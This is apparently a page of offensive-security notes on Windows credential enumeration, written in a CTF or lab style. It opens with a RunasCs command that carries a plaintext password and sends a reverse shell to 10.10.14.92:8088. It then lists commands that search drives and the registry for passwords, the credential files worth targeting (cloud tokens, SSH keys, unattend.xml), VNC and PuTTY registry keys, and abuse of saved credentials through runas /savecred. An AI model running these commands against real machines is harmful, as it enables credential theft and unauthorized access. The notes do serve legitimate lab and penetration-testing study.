Credentials enumeration

switch users using:

\runas.exe c.bum Tikkycoll_431012284 powershell -r 10.10.14.92:8088

GitHub - antonioCoco/RunasCs: RunasCs - Csharp and open version of windows builtin runas.exeGitHub

File Enumeration:

File check:

dir /b /a /s C:\ > dirs.txt - list all dirs and files

type dirs.txt | findstr /i passw - find docs with passwords

Potentially attactive file types:

certificates: gpg, pgp, p12, der, csr, cer

keys: pem, ppk, idrsa, id_dsa

backup files: bak, backup, log

Executable: bat, cmd, vbs

Config: conf, cnf, ini, xml

VPN/ RDP: ovpn, vnc, ssh, rdg (mRemoteNG), ftp, .git, .env (docker)

Potentially attractive files:

unattend.xml
sysprep.inf
sysprep.xml
VARIABLES.dat
setupinfo
setupinfo.bak
web.config
Sitelist.xml

.aws/credentials
.azure/accesstokens.json
.azure/azureprofile.json
gcloud/credentials.db
gcloud/legacycredentials
gcloud/access_token.db

Registry Enumeration:

Registry search:

reg query HCKU /f WORD /t REG_SZ /s
reg query HKLM /f WORD /t REG_SZ /s

Potentially interesting Registry:

Run with 'reg query "REG"'

HKCU\Software\ORL\WinVNC3\Password
HKCU\Software\TightVNC\Server
HKCU\Software\SimonTatham\PuTTY\Session
HKCU\Software\SimonTatham\PuTTY\Session\local
HKCU\Software\OpenSSH\Agent\Keys
HKCU\Software\

Credential Manager:

cmdkey /list 
runas /savecred /user:SAVED_USER powershell.exe 
cms.ps1; enum-creds

PreviousSystem Enumeration NextUnsecure Service Path

Last updated 3 years ago